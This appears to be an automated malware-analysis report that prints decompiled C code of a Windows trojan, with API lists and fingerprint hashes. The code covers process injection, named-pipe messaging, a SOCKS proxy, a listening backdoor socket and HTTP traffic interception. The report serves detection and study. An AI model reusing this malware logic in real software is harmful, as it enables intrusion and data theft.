        				_t21 = PathFindFileNameW(_t41);
        				_v12 = _t21;
        				if(PathMatchSpecW(_t21, L"index.dat") != 0) {
        					L16:
        					return _v8;
        				} else {
        					_t45 = 0;
        					while(1) {
        						_t24 =  *_t47;
        						if(_t24 == 0) {
        							break;
        						}
        						_t25 = PathMatchSpecW(_v12, _t24);
        						__eflags = _t25;
        						if(_t25 != 0) {
        							__eflags = _a4;
        							if(_a4 != 0) {
        								__eflags = GetModuleFileNameW(0,  &_v532, 0x103) - 0xa;
        								if(__eflags > 0) {
        									PathRemoveFileSpecW( &_v532);
        									E004137BB(__eflags,  &_v532, L"bp_shapshot.txt");
        									__eflags = _a16;
        									if(__eflags != 0) {
        										__eflags = 0;
        										E004135EC(0, _t42, _t43,  &_v532, _a12);
        									}
        								}
        								PathRemoveFileSpecW(_t41);
        								E004137BB(__eflags, _t41, L"bk_shapshot.txt");
        								__eflags = 1;
        								E004135EC(1, _t42, _t43, _t41, _a12);
        							} else {
        								_t40 = E00405D92(_t42, _t43, _a8, _a12, _v12);
        								__eflags = _t40;
        								if(_t40 != 0) {
        									_v8 = _t45;
        								}
        							}
        							L15:
        							goto L16;
        						}
        						_t47 =  &(_t47[1]);
        						_t45 = _t45 + 1;
        						__eflags = _t45;
        					}
        					goto L15;
        				}
        			}













        APIs
        • PathFindFileNameW.SHLWAPI(?,\??\), ref: 00405E63
        • PathMatchSpecW.SHLWAPI(00000000,index.dat,?,\??\), ref: 00405E72
        • PathMatchSpecW.SHLWAPI(?,00000000,?,?,\??\), ref: 00405E89
        • GetModuleFileNameW.KERNEL32(00000000,?,00000103,?,?,\??\), ref: 00405ECD
        • PathRemoveFileSpecW.SHLWAPI(?,?,?,\??\), ref: 00405EDF
          • Part of subcall function 004135EC: GetTempPathW.KERNEL32(000000F6,?,00000000,00000000), ref: 00413607
          • Part of subcall function 004135EC: GetTempFileNameW.KERNEL32(?,004040C4,00000000,?), ref: 00413629
        • PathRemoveFileSpecW.SHLWAPI(?,?,?,\??\), ref: 00405F0E
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: Path$File$Spec$Name$MatchRemoveTemp$FindModule
        • String ID: \??\$bk_shapshot.txt$bp_shapshot.txt$index.dat
        • API String ID: 2350928307-4187504128
        • Opcode ID: 51789b8e060509b90e71a3f1e42d5f668b5198a85870918c37ce7813a0ec4508
        • Instruction ID: d8cb0f9cd52d0d207e5563dd21c26caf7db3688926f01185b6d3b83589e29a9f
        • Opcode Fuzzy Hash: 51789b8e060509b90e71a3f1e42d5f668b5198a85870918c37ce7813a0ec4508
        • Instruction Fuzzy Hash: 8221CEB1940609ABDB10AFB1DC48AEF7AACEF54315F104477F911F21D0E67CCA808B98
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 87%
        			E00409D7D() {
        				void* _v8;
        				char _v12;
        				intOrPtr _v16;
        				int _v20;
        				short _v544;
        				long _v572;
        				void* _v580;
        				void* __edi;
        				intOrPtr _t20;
        				void* _t25;
        				void* _t26;
        				intOrPtr _t28;
        				void* _t30;
        				void* _t36;
        				void* _t38;
        
        				_t20 =  *0x414ad4; // 0x241f5a8
        				_v16 = E0040AA33(0,  *((intOrPtr*)(_t20 + 0x2c)), 4, 0, 0, 0, 0);
        				_t36 = GetCurrentThread();
        				_v20 = GetThreadPriority(_t36);
        				SetThreadPriority(_t36, 1);
        				_v12 = 3;
        				do {
        					_v580 = 0x22c;
        					_t25 = CreateToolhelp32Snapshot(2, 0);
        					_t37 =  &_v580;
        					_v8 = _t25;
        					Process32FirstW(_t25,  &_v580);
        					while(_t25 != 0) {
        						_t26 = _v572;
        						__eflags = _t26;
        						if(_t26 != 0) {
        							__eflags = _t26 -  *0x414c94; // 0x1030
        							if(__eflags != 0) {
        								__eflags = _t26 - _v16;
        								if(_t26 != _v16) {
        									_t28 =  *0x414ad4; // 0x241f5a8
        									_t30 = lstrcmpiW( &_v544,  *(_t28 + 0x50));
        									__eflags = _t30;
        									if(_t30 != 0) {
        										_t38 = OpenProcess(0x43a, 0, _v572);
        										__eflags = _t38;
        										if(_t38 != 0) {
        											_push(_v572);
        											E00407C9A(_t37, _t38);
        											CloseHandle(_t38);
        										}
        									}
        								}
        							}
        						}
        						_t25 = Process32NextW(_v8,  &_v580);
        					}
        					CloseHandle(_v8);
        					_t17 =  &_v12;
        					 *_t17 = _v12 - 1;
        				} while ( *_t17 != 0);
        				return SetThreadPriority(_t36, _v20);
        			}


















        APIs
          • Part of subcall function 0040AA33: CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000,000000FF,?,?,00000000), ref: 0040AA88
          • Part of subcall function 0040AA33: SetNamedPipeHandleState.KERNEL32(00000000,000000FF,00000000,00000000,?,?,00000000), ref: 0040AAA3
          • Part of subcall function 0040AA33: WriteFile.KERNEL32(00000000,?,00000004,00000002,00000000,?,?,00000000), ref: 0040AABF
          • Part of subcall function 0040AA33: WriteFile.KERNEL32(00000000,00000000,00000004,00000002,00000000,?,?,00000000), ref: 0040AAD8
          • Part of subcall function 0040AA33: WriteFile.KERNEL32(00000000,00000000,00000000,00000002,00000000,?,?,00000000), ref: 0040AAF2
          • Part of subcall function 0040AA33: ReadFile.KERNEL32(00000000,00000002,00000004,00000002,00000000,?,?,00000000), ref: 0040AB0B
          • Part of subcall function 0040AA33: ReadFile.KERNEL32(00000000,00000000,00000004,00000002,00000000,?,?,00000000), ref: 0040AB28
        • GetCurrentThread.KERNEL32 ref: 00409DA1
        • GetThreadPriority.KERNEL32(00000000), ref: 00409DAA
        • SetThreadPriority.KERNEL32(00000000,00000001), ref: 00409DB6
        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00409DD0
        • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00409DE1
        • lstrcmpiW.KERNEL32(?,?), ref: 00409E0F
        • OpenProcess.KERNEL32(0000043A,00000000,?), ref: 00409E25
        • CloseHandle.KERNEL32(00000000), ref: 00409E3D
        • Process32NextW.KERNEL32(?,0000022C), ref: 00409E4D
        • CloseHandle.KERNEL32(?), ref: 00409E5A
        • SetThreadPriority.KERNEL32(00000000,?), ref: 00409E6D
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: File$Thread$HandlePriorityWrite$CloseCreateProcess32Read$CurrentFirstNamedNextOpenPipeProcessSnapshotStateToolhelp32lstrcmpi
        • String ID:
        • API String ID: 2830737922-0
        • Opcode ID: b6a40fda316bec3538b3d7b0ad590c3397781c1bc69565e118533a4e6149f625
        • Instruction ID: 4697aaebaa590e1308d55a66fccee1dcd345b5829465a605fac2d6f368f090ab
        • Opcode Fuzzy Hash: b6a40fda316bec3538b3d7b0ad590c3397781c1bc69565e118533a4e6149f625
        • Instruction Fuzzy Hash: CF213B71A00214ABDF20ABA1ED4CADEBF78FF44751F0080B5F109A61A1D7B49E50CBA8
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 72%
        			E0040997D(void* __esi, intOrPtr _a4, char _a7, long _a8, char _a12) {
        				signed int _v8;
        				void* _v12;
        				signed int _v16;
        				char _v20;
        				short _v22;
        				char _v24;
        				void* __edi;
        				signed short _t40;
        				signed int _t42;
        				long _t45;
        				long _t46;
        				char _t49;
        				char _t51;
        				long _t52;
        				long _t53;
        				long _t58;
        				long _t61;
        				long _t66;
        				long _t68;
        				void* _t70;
        				intOrPtr _t72;
        				void* _t74;
        				long _t76;
        				void* _t77;
        				intOrPtr* _t80;
        				void* _t81;
        				void* _t85;
        				long _t86;
        
        				_t81 = __esi;
        				_push("socks");
        				_push(_a4);
        				if( *0x414dc8() != 0) {
        					_t40 = E0040F3F1(_a4, _t74);
        					_t3 = _t40 - 1; // -1
        					__eflags = _t3 - 0xfffd;
        					if(_t3 > 0xfffd) {
        						L5:
        						return 0;
        					}
        					_t42 = _t40 & 0x0000ffff;
        					L4:
        					if(_t42 != 0) {
        						_v8 = _v8 & 0x00000000;
        						asm("rol ax, 0x8");
        						_v16 = _t42 & 0x0000ffff;
        						_t45 =  *0x414ce0(_a8, _a12, 0,  &_a8);
        						__eflags = _t45;
        						if(_t45 != 0) {
        							goto L5;
        						}
        						_t46 = _a8;
        						while(1) {
        							__eflags = _t46;
        							if(_t46 == 0) {
        								break;
        							}
        							__eflags =  *((intOrPtr*)(_t46 + 4)) - 2;
        							if( *((intOrPtr*)(_t46 + 4)) == 2) {
        								_t72 =  *((intOrPtr*)(_t46 + 0x10));
        								_v8 = E0040F1B1( *((intOrPtr*)(_t46 + 0x18)), _t72);
        								L12:
        								 *0x414ce4(_a8, _t77);
        								_t78 = _v8;
        								__eflags = _v8;
        								if(_v8 != 0) {
        									_a7 = 0;
        									_t49 = E00410692(_t78, _t72);
        									_a12 = _t49;
        									__eflags = _t49 - 0xffffffff;
        									if(_t49 == 0xffffffff) {
        										L35:
        										E0040F15E(_v8);
        										_t51 = _a7;
        										L36:
        										return _t51;
        									}
        									_t76 =  *0x414d10; // 0x6c646e61
        									__eflags = _t76;
        									if(_t76 == 0) {
        										_t52 = 0;
        										__eflags = 0;
        									} else {
        										_t52 = E0040F637(_t76);
        									}
        									_push(_t81);
        									_t53 = E00409755(_t76, _t52, __eflags, _a12, 1, _t76);
        									__eflags = _t53;
        									if(_t53 == 0) {
        										L34:
        										E00410970(_a12);
        										goto L35;
        									} else {
        										_a7 = 1;
        										while(1) {
        											_t85 = E00410888(0,  &_a12, 0x3e8, 0);
        											__eflags = _t85 - 0xffffffff;
        											if(_t85 != 0xffffffff) {
        												goto L23;
        											}
        											L22:
        											_t70 =  *0x414d04();
        											__eflags = _t70 - 0x274c;
        											if(_t70 != 0x274c) {
        												goto L34;
        											}
        											L23:
        											_t58 = WaitForSingleObject( *0x414a30, 0);
        											__eflags = _t58;
        											if(_t58 == 0) {
        												goto L34;
        											}
        											L24:
        											__eflags = _t85 - 0xffffffff;
        											if(_t85 == 0xffffffff) {
        												do {
        													_t85 = E00410888(0,  &_a12, 0x3e8, 0);
        													__eflags = _t85 - 0xffffffff;
        													if(_t85 != 0xffffffff) {
        														goto L23;
        													}
        													goto L22;
        												} while (_t85 == 0xffffffff);
        											}
        											_t61 = E00409660( &_v24, _t76, _a12,  &_v12);
        											__eflags = _t61;
        											if(_t61 == 0) {
        												goto L34;
        											}
        											__eflags = _v20 - 2;
        											_t80 = _v12;
        											if(_v20 != 2) {
        												L33:
        												E0040F15E(_t80);
        												continue;
        											}
        											__eflags = _v22 - 4;
        											if(_v22 != 4) {
        												goto L33;
        											}
        											_t86 = RtlAllocateHeap( *0x415fa8, 8, 0x14);
        											__eflags = _t86;
        											if(_t86 == 0) {
        												goto L33;
        											}
        											 *((short*)(_t86 + 8)) = _v16;
        											 *((intOrPtr*)(_t86 + 4)) = _t72;
        											 *((intOrPtr*)(_t86 + 0xc)) =  *_t80;
        											_t66 = E0040F1B1(_v8, _t72);
        											 *_t86 = _t66;
        											__eflags = _t66;
        											if(_t66 == 0) {
        												L32:
        												E0040F15E(_t86);
        												goto L33;
        											}
        											 *0x414a2c =  *0x414a2c + 1;
        											_t68 = E0040B81A(_t76, E004098EC, _t86);
        											__eflags = _t68;
        											if(_t68 > 0) {
        												goto L33;
        											}
        											 *0x414a2c =  *0x414a2c - 1;
        											__eflags =  *0x414a2c;
        											E0040F15E( *_t86);
        											goto L32;
        										}
        									}
        								}
        								_t51 = 0;
        								goto L36;
        							}
        							_t46 =  *(_t46 + 0x1c);
        						}
        						_t72 = _a4;
        						goto L12;
        					}
        					goto L5;
        				}
        				_t42 =  *0x414a38 & 0x0000ffff;
        				goto L4;
        			}































        APIs
        • lstrcmpi.KERNEL32(?,socks), ref: 0040998B
        • getaddrinfo.WS2_32(?,?,00000000,?), ref: 004099DA
        • FreeAddrInfoW.WS2_32(?), ref: 004099FE
        • WSAGetLastError.WS2_32(00000002,000003E8,00000000,?,?,?,?,?,?), ref: 00409A7F
        • WaitForSingleObject.KERNEL32(00000000,?,000003E8,00000000,?,?,?,?,?), ref: 00409A98
        • RtlAllocateHeap.NTDLL(00000008,00000014), ref: 00409AD8
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: AddrAllocateErrorFreeHeapInfoLastObjectSingleWaitgetaddrinfolstrcmpi
        • String ID: andle$atorA$socks
        • API String ID: 972253065-3881547300
        • Opcode ID: fb3b4f64b4ac218035f382c1a4b9332715a65c3c4ba19518c2e5a9eb08be6af0
        • Instruction ID: e2f13ce5751d9ab031013644765e95df92a03ca329c5415e73f87ea71180ab3d
        • Opcode Fuzzy Hash: fb3b4f64b4ac218035f382c1a4b9332715a65c3c4ba19518c2e5a9eb08be6af0
        • Instruction Fuzzy Hash: 8E519D71600205EBCF20AF61DC45AAE7BB4FF01764F10843AF955BB2E2E7389E459B58
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 67%
        			E0040E887(void* __eax, void* __ecx, signed int __edx, void* _a4, signed int _a8, signed int _a12) {
        				signed int _v8;
        				void* __edi;
        				void* __esi;
        				signed int _t31;
        				long _t32;
        				DWORD* _t36;
        				void _t38;
        				signed int _t40;
        				signed int _t43;
        				signed int _t44;
        				intOrPtr _t45;
        				signed int _t47;
        				signed int _t55;
        				DWORD* _t58;
        				signed int _t64;
        				void* _t67;
        				void* _t72;
        
        				_t64 = __edx;
        				_t61 = __ecx;
        				_push(__ecx);
        				_t67 = __eax;
        				_t58 = __eax + 0x400;
        				 *_t58 = 0x3fc;
        				if(InternetQueryOptionA(_a4, 0x22, __eax, _t58) == 0) {
        					L21:
        					_t31 = 0;
        					__eflags = 0;
        					L22:
        					return _t31;
        				}
        				_t32 =  *_t58;
        				if(_t32 <= 8) {
        					goto L21;
        				}
        				 *((char*)(_t32 + _t67)) = 0;
        				 *0x414ed8(0x414f68);
        				E0040D472(_t67,  *_t58);
        				 *0x414edc(0x414f68);
        				_t36 = _t67 + 0x410;
        				_t72 = _t67 + 0x404;
        				 *_t36 = 9;
        				if(HttpQueryInfoA(_a4, 0x2d, _t72, _t36, 0) == 0) {
        					goto L21;
        				}
        				_t38 =  *_t72;
        				if(_t38 == 0x47) {
        					L5:
        					if(E00408849(_t61, _t80, "809dslffsdfsdfgg", _t67, 1) == 0) {
        						_t40 = E00404196(_t61);
        						__eflags = _t40;
        						_v8 = _t40;
        						 *((char*)(_t67 + 0x414)) = _t40 & 0xffffff00 | _t40 != 0x00000000;
        						 *(_t67 + 0x420) = _a4;
        						_t43 = _a12;
        						 *((intOrPtr*)(_t67 + 0x42c)) = 0;
        						 *((intOrPtr*)(_t67 + 0x428)) = 0;
        						__eflags = _t43;
        						if(_t43 == 0) {
        							L11:
        							 *(_t67 + 0x41c) = 0;
        							 *(_t67 + 0x418) = 0;
        							L12:
        							_t44 = E0040BAF5(_t64, _t67, _v8);
        							__eflags = _t44;
        							if(_t44 == 0) {
        								goto L6;
        							}
        							_t45 =  *0x414ad4; // 0x241f5a8
        							_t63 =  *((intOrPtr*)(_t45 + 0x14c));
        							_t65 = E0040F637( *((intOrPtr*)(_t45 + 0x14c)));
        							_t47 = E0040A3D4( *((intOrPtr*)(_t45 + 0x14c)), _t46, _t67,  *_t58, 0, 0, 0);
        							__eflags = _t47;
        							if(_t47 != 0) {
        								_t55 = E0040F346( *_t58, _t67);
        								__eflags = _t55;
        								if(_t55 != 0) {
        									E0040B81A(_t63, E0040C849, _t55);
        								}
        							}
        							__eflags =  *((char*)(_t67 + 0x414));
        							if(__eflags != 0) {
        								 *0x414ed8(0x414f68);
        								_t60 = _v8;
        								__eflags = E0040D2F0(_t65, _t67, __eflags, _v8, 0x4e28, 8, 0xa, E0040E503);
        								if(__eflags == 0) {
        									E0040D2F0(_t65, _t67, __eflags, _t60, 0x4e29, 6, 8, E0040D772);
        									E0040D574(_t65, _t60, _t67);
        								} else {
        									 *(_t67 + 0x424) =  *(_t67 + 0x424) | 0x00000002;
        								}
        								 *0x414edc(0x414f68);
        								E0040F15E(_t60);
        							}
        							L7:
        							_t31 = 1;
        							goto L22;
        						}
        						_t64 = _a8;
        						__eflags = _t64;
        						if(_t64 == 0) {
        							goto L11;
        						} else {
        							 *(_t67 + 0x41c) = _t43;
        							 *(_t67 + 0x418) = _t64;
        							goto L12;
        						}
        					}
        					L6:
        					 *(_t67 + 0x424) =  *(_t67 + 0x424) | 0x00000004;
        					SetLastError(0x2f78);
        					goto L7;
        				}
        				_t80 = _t38 - 0x50;
        				if(_t38 != 0x50) {
        					goto L21;
        				}
        				goto L5;
        			}




















        APIs
        • InternetQueryOptionA.WININET(?,00000022,?,?), ref: 0040E8A3
        • RtlEnterCriticalSection.NTDLL(essAsUserA), ref: 0040E8C6
        • RtlLeaveCriticalSection.NTDLL(essAsUserA), ref: 0040E8D5
        • HttpQueryInfoA.WININET(?,0000002D,?,?,00000000), ref: 0040E8F6
        • SetLastError.KERNEL32(00002F78), ref: 0040E92F
          • Part of subcall function 00404196: CreateMutexW.KERNEL32(004155B4,00000000,?), ref: 004041B1
        • RtlEnterCriticalSection.NTDLL(essAsUserA), ref: 0040E9E9
        • RtlLeaveCriticalSection.NTDLL(essAsUserA), ref: 0040EA2F
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: CriticalSection$EnterLeaveQuery$CreateErrorHttpInfoInternetLastMutexOption
        • String ID: 809dslffsdfsdfgg$essAsUserA
        • API String ID: 4246016607-4269529348
        • Opcode ID: 6441aaddbb206ca703e41a38bb3d7d81ee4d57befe1b7e0a4c4f591c9cee15e1
        • Instruction ID: 9428ca7a0f9ea51ad5fc9d9fb7fc5f80a0a524135bf182b993fa5b074a75bae1
        • Opcode Fuzzy Hash: 6441aaddbb206ca703e41a38bb3d7d81ee4d57befe1b7e0a4c4f591c9cee15e1
        • Instruction Fuzzy Hash: 2C41D5B1700201BAC7249F628C85FDB7B68BF89744F04843AF604B62D2C7789965DBAD
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 88%
        			E0040AA33(void* __eflags, long _a4, void _a8, void** _a12, long* _a16, void _a20, void _a24) {
        				char _v5;
        				void _v12;
        				short _v532;
        				long* _t67;
        				void** _t69;
        				long _t70;
        				void* _t71;
        				long _t73;
        				void* _t74;
        
        				_v12 = _v12 | 0xffffffff;
        				_v5 = 1;
        				E0040A739( &_v532, _a4);
        				while(1) {
        					_t71 = CreateFileW( &_v532, 0xc0000000, 3, 0, 3, 0, 0);
        					if(_t71 != 0xffffffff) {
        						break;
        					}
        					if(_v5 != 0) {
        						WaitNamedPipeW( &_v532, 0xffffffff);
        						_v5 = 0;
        						continue;
        					}
        					L23:
        					return _v12;
        				}
        				_a4 = 2;
        				if(SetNamedPipeHandleState(_t71,  &_a4, 0, 0) != 0) {
        					_push(0);
        					_push( &_a4);
        					_t73 = 4;
        					if(WriteFile(_t71,  &_a8, _t73, ??, ??) != 0 && WriteFile(_t71,  &_a24, _t73,  &_a4, 0) != 0 && WriteFile(_t71, _a20, _a24,  &_a4, 0) != 0 && ReadFile(_t71,  &_v12, _t73,  &_a4, 0) != 0 && _a4 == _t73) {
        						_a20 = 0;
        						if(ReadFile(_t71,  &_a20, _t73,  &_a4, 0) == 0 || _a4 != _t73) {
        							_v12 = _v12 | 0xffffffff;
        						} else {
        							_t62 = _a20;
        							if(_a20 > 0) {
        								_t74 = E0040F14B(_t62);
        								if(_t74 == 0 || ReadFile(_t71, _t74, _a20,  &_a4, 0) == 0) {
        									L19:
        									_v12 = _v12 | 0xffffffff;
        									goto L20;
        								} else {
        									_t70 = _a20;
        									if(_t70 != _a4) {
        										goto L19;
        									} else {
        										_t69 = _a12;
        										if(_t69 == 0) {
        											L20:
        											E0040F15E(_t74);
        										} else {
        											_t67 = _a16;
        											if(_t67 == 0) {
        												goto L20;
        											} else {
        												 *_t69 = _t74;
        												 *_t67 = _t70;
        											}
        										}
        									}
        								}
        							}
        						}
        					}
        				}
        				CloseHandle(_t71);
        				goto L23;
        			}












        APIs
          • Part of subcall function 0040A739: lstrcpyW.KERNEL32(?,\\.\pipe\), ref: 0040A742
          • Part of subcall function 0040A739: lstrcpyW.KERNEL32(?,?), ref: 0040A750
        • WaitNamedPipeW.KERNEL32(?,000000FF,?,?,00000000), ref: 0040AA70
        • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000,000000FF,?,?,00000000), ref: 0040AA88
        • SetNamedPipeHandleState.KERNEL32(00000000,000000FF,00000000,00000000,?,?,00000000), ref: 0040AAA3
        • WriteFile.KERNEL32(00000000,?,00000004,00000002,00000000,?,?,00000000), ref: 0040AABF
        • WriteFile.KERNEL32(00000000,00000000,00000004,00000002,00000000,?,?,00000000), ref: 0040AAD8
        • WriteFile.KERNEL32(00000000,00000000,00000000,00000002,00000000,?,?,00000000), ref: 0040AAF2
        • ReadFile.KERNEL32(00000000,00000002,00000004,00000002,00000000,?,?,00000000), ref: 0040AB0B
        • ReadFile.KERNEL32(00000000,00000000,00000004,00000002,00000000,?,?,00000000), ref: 0040AB28
        • ReadFile.KERNEL32(00000000,00000000,00000000,00000002,00000000,?,?,00000000), ref: 0040AB53
          • Part of subcall function 0040F15E: HeapFree.KERNEL32(00000000,00000000,0040AD5B,00000000,00000001), ref: 0040F171
        • CloseHandle.KERNEL32(00000000,?,?,00000000), ref: 0040AB8A
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: File$ReadWrite$HandleNamedPipelstrcpy$CloseCreateFreeHeapStateWait
        • String ID:
        • API String ID: 34731080-0
        • Opcode ID: 184f8cf6fc59975507e9ed02efdd8c0e894f587f69fc86c87007a8dc6aafcc23
        • Instruction ID: 68feef118c699048b2a897f71f9ab120b5d43b8b440629adc0ec0de95e345929
        • Opcode Fuzzy Hash: 184f8cf6fc59975507e9ed02efdd8c0e894f587f69fc86c87007a8dc6aafcc23
        • Instruction Fuzzy Hash: 4D413A72100209BBDB119FA4DC84DEF3B7DAB453A0F008136FA15E62D0D674DAA5CBA6
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 97%
        			E0040AEF2(short* __edx) {
        				long _v8;
        				char _v12;
        				short _v112;
        				short _v632;
        				signed char _t32;
        				long _t39;
        				intOrPtr _t41;
        				long _t44;
        				intOrPtr _t48;
        				unsigned int _t50;
        				long _t54;
        				intOrPtr _t60;
        				long _t63;
        				void* _t67;
        				short* _t70;
        				void* _t73;
        				CHAR* _t74;
        
        				_t70 = __edx;
        				_t32 =  *0x414be8; // 0x0
        				asm("sbb esi, esi");
        				_v8 = 0x206;
        				_t73 =  ~(_t32 & 1) + 0x80000002;
        				E0040F21C( &_v632,  &_v632, 0, 0x208);
        				if(__edx == 0xffffffff) {
        					L9:
        					_v8 = 0x31;
        					if(GetComputerNameW( &_v112,  &_v8) == 0) {
        						lstrcpyW( &_v112, L"unknown");
        					}
        					_t39 = GetTickCount();
        					_t41 =  *0x414ad4; // 0x241f5a8
        					_t44 = wnsprintfW( &_v632, 0x103,  *(_t41 + 0x58),  &_v112, _t39) + _t43;
        					L12:
        					_v8 = _t44 + 2;
        					_t48 =  *0x414ad4; // 0x241f5a8
        					E0040861B(_t73,  *((intOrPtr*)(_t48 + 0x34)),  *((intOrPtr*)(_t48 + 0x38)), 1,  &_v632, _t44 + 2);
        					_t50 = _v8;
        					L13:
        					_v8 = (_t50 >> 1) - 1;
        					_t74 = E0040F583((_t50 >> 1) - 1,  &_v632);
        					_t54 = CharLowerBuffA(_t74, _v8);
        					_t67 = 0;
        					if(_v8 <= 0) {
        						L20:
        						 *0x414d10 = _t74;
        						return _t54;
        					} else {
        						goto L14;
        					}
        					do {
        						L14:
        						_t54 =  *((intOrPtr*)(_t67 + _t74));
        						if(_t54 < 0x61 || _t54 > 0x7a) {
        							if(_t54 < 0x30 || _t54 > 0x39) {
        								 *((char*)(_t67 + _t74)) = 0x5f;
        							}
        						}
        						_t67 = _t67 + 1;
        					} while (_t67 < _v8);
        					goto L20;
        				}
        				if(__edx == 0 ||  *__edx == 0) {
        					_t60 =  *0x414ad4; // 0x241f5a8
        					if(E004085D2(_t73,  *((intOrPtr*)(_t60 + 0x34)),  *((intOrPtr*)(_t60 + 0x38)),  &_v12,  &_v632,  &_v8) != 0 && _v12 == 1) {
        						_t50 = _v8;
        						if(_t50 > 4) {
        							goto L13;
        						}
        					}
        					goto L9;
        				} else {
        					_t63 = E0040F649(__edx) + _t62;
        					_v8 = _t63;
        					if(_t63 >= 0x204) {
        						_t63 = 0x204;
        					}
        					E0040F19A( &_v632, _t70, _t63);
        					_t44 = _v8;
        					goto L12;
        				}
        			}

        APIs
        • GetComputerNameW.KERNEL32(?,00000206), ref: 0040AFA7
        • lstrcpyW.KERNEL32(?,unknown), ref: 0040AFBA
        • GetTickCount.KERNEL32 ref: 0040AFC0
        • wnsprintfW.SHLWAPI ref: 0040AFDF
        • CharLowerBuffA.USER32(00000000,00000031,?,?,?,?,00000001,?,00000002), ref: 0040B025
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: BuffCharComputerCountLowerNameTicklstrcpywnsprintf
        • String ID: 1$andle$unknown
        • API String ID: 2565877886-336978794
        • Opcode ID: b3c9355ab330fbde3ccf396519293f0bb69027f813ebc6933952a9e13373b0d1
        • Instruction ID: 6c248ed7dd9890e06c8fd7869b10a429f201529412d380f689f1795a1126b4c9
        • Opcode Fuzzy Hash: b3c9355ab330fbde3ccf396519293f0bb69027f813ebc6933952a9e13373b0d1
        • Instruction Fuzzy Hash: 35419CB2900219AFCF10EBA4CE48ADE77BDEB44304F1041BAE515E7292D7399B45CB99
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 31%
        			E004094DE() {
        				intOrPtr _v12;
        				short* _v16;
        				signed int _v20;
        				char _v24;
        				intOrPtr _v28;
        				char _v32;
        				short _v46;
        				char _v48;
        				short _v86;
        				char _v88;
        				signed int _v348;
        				signed int _v352;
        				void* __edi;
        				short _t39;
        				signed int _t40;
        				signed int _t42;
        				void* _t47;
        				intOrPtr* _t52;
        				intOrPtr _t62;
        				void* _t67;
        				signed int _t68;
        				signed int _t69;
        				signed int _t70;
        				void* _t72;
        
        				_v20 = 0;
        				_v16 = 0x414a38;
        				_v12 = E00409492;
        				E0040F21C( &_v88,  &_v88, 0, 0x26);
        				_t39 = 2;
        				_v88 = _t39;
        				_t68 = 0x9c40;
        				while(1) {
        					_t40 = E0041025C();
        					asm("rol dx, 0x8");
        					_v86 = _t40 % 0x7531 + 0x2710;
        					_t42 = E004106C8( &_v88, 0x10, 0x7fffffff);
        					if(_t42 != 0xffffffff) {
        						break;
        					}
        					_t68 = _t68 - 1;
        					if(_t68 > 0) {
        						continue;
        					} else {
        						_t69 = _t68 | _t42;
        						L4:
        						if(_t69 != 0xffffffff) {
        							_push( &_v24);
        							_push( &_v48);
        							_push(_t69);
        							_v24 = 0x10;
        							if( *0x414ce8() == 0) {
        								asm("rol ax, 0x8");
        								_v20 = _t69;
        								 *0x414a38 = _v46;
        							}
        						}
        						_v32 = 0;
        						_v28 = 0xf4240;
        						while(WaitForSingleObject( *0x414a30, 0x64) != 0) {
        							_v348 = _v20;
        							_v352 = 1;
        							_t47 =  *0x414cf8(0,  &_v352, 0, 0,  &_v32);
        							if(_t47 == 0xffffffff) {
        								break;
        							}
        							if(_t47 <= 0) {
        								continue;
        							}
        							L19:
        							while(_v352 != 0) {
        								_v352 = _v352 - 1;
        								_t62 =  *((intOrPtr*)(_t72 + _v352 * 4 - 0x158));
        								_t70 = 0;
        								_t52 =  &_v20;
        								while(_t62 !=  *_t52) {
        									_t70 = _t70 + 1;
        									_t52 = _t52 + 0xc;
        									if(_t70 < 1) {
        										continue;
        									}
        									goto L19;
        								}
        								_t71 = _t70 * 0xc;
        								_t67 =  *0x414cd0( *((intOrPtr*)(_t72 + _t70 * 0xc - 0x10)), 0, 0);
        								if(_t67 != 0xffffffff) {
        									 *0x414a2c =  *0x414a2c + 1;
        									if(E0040B81A(_t62,  *((intOrPtr*)(_t72 + _t71 - 8)), _t67) == 0) {
        										 *0x414cb0(_t67);
        										 *0x414a2c =  *0x414a2c - 1;
        									}
        								}
        							}
        						}
        						 *0x414cb0(_v20);
        						 *0x414a2c =  *0x414a2c - 1;
        						_push(0);
        						RtlExitUserThread();
        						return 0;
        					}
        				}
        				_t69 = _t42;
        				goto L4;
        			}

        APIs
          • Part of subcall function 0041025C: GetTickCount.KERNEL32 ref: 0041025C
          • Part of subcall function 004106C8: socket.WS2_32(?,00000001,00000006), ref: 004106D1
          • Part of subcall function 004106C8: bind.WS2_32(00000000,?,?), ref: 004106E4
          • Part of subcall function 004106C8: listen.WS2_32(00000000,?), ref: 004106F3
          • Part of subcall function 004106C8: closesocket.WS2_32(00000000), ref: 004106FE
        • getsockname.WS2_32(00000000,?,?), ref: 00409561
        • select.WS2_32(00000000,?,00000000,00000000,?), ref: 004095B0
        • accept.WS2_32(?,00000000,00000000), ref: 004095F5
        • closesocket.WS2_32(00000000), ref: 00409617
        • WaitForSingleObject.KERNEL32(00000064,00000010,7FFFFFFF,?,00000000,00000026), ref: 00409633
        • closesocket.WS2_32(?), ref: 00409644
        • RtlExitUserThread.NTDLL(00000000), ref: 00409651
        Strings
        Memory Dump Source
